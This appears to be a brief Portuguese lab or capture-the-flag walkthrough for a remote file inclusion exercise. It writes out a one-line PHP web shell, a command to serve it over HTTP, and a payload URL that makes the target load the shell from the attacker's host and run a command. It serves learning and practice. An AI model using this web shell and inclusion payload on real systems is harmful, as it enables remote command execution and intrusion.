RFI - 1
Ataque o alvo, obtenha a execução do comando explorando a vulnerabilidade RFI e, em seguida, procure o sinalizador em um dos diretórios em /
Vamos escrever o nosso web shell
echo '<?php system($_GET["cmd"]); ?>' > shell.php
Vamos iniciar um servidor http
sudo python3 -m http.server <LISTENING_PORT>
Agora, podemos incluir nosso shell local por meio de RFI, como fizemos antes, mas usando
<OUR_IP>
e nosso<LISTENING_PORT>
. Também especificaremos o comando a ser executado com&cmd=id
:
Pyload :
http://<SERVER_IP>:<PORT>/index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=id

Last updated